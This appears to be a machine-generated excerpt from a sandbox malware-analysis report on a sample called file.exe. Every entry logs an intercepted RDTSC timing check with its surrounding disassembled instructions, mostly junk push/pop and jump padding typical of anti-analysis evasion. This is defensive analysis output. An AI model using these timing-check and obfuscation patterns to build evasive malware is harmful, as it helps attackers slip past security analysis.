                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E76A6 second address: 12E76B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jl 00007FC2CCC4B416h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E860A second address: 12E860E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E76B3 second address: 12E76DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC2CCC4B428h 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FC2CCC4B416h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94C8 second address: 12E94CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94CC second address: 12E951F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2CCC4B416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push edx 0x0000000d mov bx, di 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 jmp 00007FC2CCC4B41Bh 0x00000018 push 00000000h 0x0000001a mov ebx, 018150ABh 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 jmp 00007FC2CCC4B41Bh 0x00000026 pushad 0x00000027 jmp 00007FC2CCC4B421h 0x0000002c jns 00007FC2CCC4B416h 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push edi 0x00000038 pushad 0x00000039 popad 0x0000003a pop edi 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6AA second address: 12EC6B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC2CCD28606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6B5 second address: 12EC6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, si 0x0000000d jmp 00007FC2CCC4B426h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 mov dword ptr [ebp+1245AEEDh], eax 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D31ADh], edi 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FC2CCC4B41Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6FE second address: 12EC703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC703 second address: 12EC724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B428h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE6AD second address: 12EE6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ED872 second address: 12ED876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ED876 second address: 12ED87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6CF5 second address: 12F6CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6CFB second address: 12F6D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 jmp 00007FC2CCD2860Ah 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6D12 second address: 12F6D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6D18 second address: 12F6D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007FC2CCD28606h 0x0000000c popad 0x0000000d push edx 0x0000000e ja 00007FC2CCD28606h 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F63FF second address: 12F6405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6405 second address: 12F6409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6409 second address: 12F6423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B423h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6423 second address: 12F6428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6428 second address: 12F6440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FC2CCC4B416h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e js 00007FC2CCC4B41Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6440 second address: 12F6450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FC2CCD28612h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6450 second address: 12F645E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC2CCC4B416h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F645E second address: 12F6462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6462 second address: 12F646C instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2CCC4B416h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F646C second address: 12F6472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F68A6 second address: 12F68B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCC4B41Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F68B5 second address: 12F68B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9F68 second address: 12F9F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9F6C second address: 12F9F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9F70 second address: 12F9F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9F76 second address: 12F9F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC2CCD2860Ah 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC39E second address: 12FC3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC3A2 second address: 12FC3A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282433 second address: 1282447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC2CCC4B41Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282447 second address: 128244B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1302106 second address: 130210C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13028FB second address: 1302916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC2CCD28606h 0x0000000a jmp 00007FC2CCD28611h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1302916 second address: 130291C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130291C second address: 1302925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AB5B second address: 128AB5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B10C second address: 130B112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B112 second address: 130B117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B3E4 second address: 130B3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FC2CCD2860Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B3F9 second address: 130B3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B3FF second address: 130B41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC2CCD28608h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B93E second address: 130B94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC2CCC4B416h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B94B second address: 130B953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B953 second address: 130B957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C02F second address: 130C033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C413 second address: 130C430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2CCC4B429h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C430 second address: 130C434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311EDB second address: 1311EFE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FC2CCC4B429h 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311EFE second address: 1311F0A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC2CCD2860Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D090C second address: 12D0911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0FB1 second address: 12D1013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC2CCD28606h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FC2CCD28608h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D2F00h], eax 0x00000031 nop 0x00000032 push ecx 0x00000033 pushad 0x00000034 jl 00007FC2CCD28606h 0x0000003a jmp 00007FC2CCD28618h 0x0000003f popad 0x00000040 pop ecx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1013 second address: 12D101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D10F9 second address: 12D1134 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC2CCD28614h 0x0000000f pushad 0x00000010 jns 00007FC2CCD28606h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 je 00007FC2CCD2860Ch 0x00000026 js 00007FC2CCD28606h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1134 second address: 12D1174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FC2CCC4B428h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC2CCC4B426h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1174 second address: 12D117A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D117A second address: 12D117F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1949 second address: 12D194F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D194F second address: 12D1960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FC2CCC4B41Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1960 second address: 12D1964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1964 second address: 12D196E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2CCC4B41Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1C3F second address: 12D1C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC2CCD2860Ch 0x00000012 jnp 00007FC2CCD28606h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1C62 second address: 12D1C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1310FD6 second address: 1310FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCD28619h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1310FF3 second address: 1310FFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1310FFD second address: 1311001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311001 second address: 1311007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311007 second address: 1311029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC2CCD28611h 0x00000010 jc 00007FC2CCD28606h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311029 second address: 131102F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311440 second address: 1311444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131156C second address: 13115A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCC4B422h 0x00000009 jmp 00007FC2CCC4B428h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2CCC4B41Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13115A6 second address: 13115AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311729 second address: 131172D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131172D second address: 1311739 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2CCD28606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311739 second address: 1311741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311741 second address: 1311745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316C48 second address: 1316C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC2CCC4B41Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316C5F second address: 1316C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316C67 second address: 1316C9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC2CCC4B426h 0x00000008 jmp 00007FC2CCC4B425h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FC2CCC4B416h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316C9E second address: 1316CA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316CA4 second address: 1316CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007FC2CCC4B416h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316CBA second address: 1316CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316CC2 second address: 1316CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316F79 second address: 1316F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13170E6 second address: 13170F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FC2CCC4B416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13170F5 second address: 1317100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC2CCD28606h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317100 second address: 1317106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317106 second address: 131710A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131729B second address: 13172A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13172A6 second address: 13172AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131D659 second address: 131D65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FD3B second address: 131FD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5E5 second address: 128C5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC2CCC4B416h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5F3 second address: 128C5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323541 second address: 1323547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323A82 second address: 1323A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
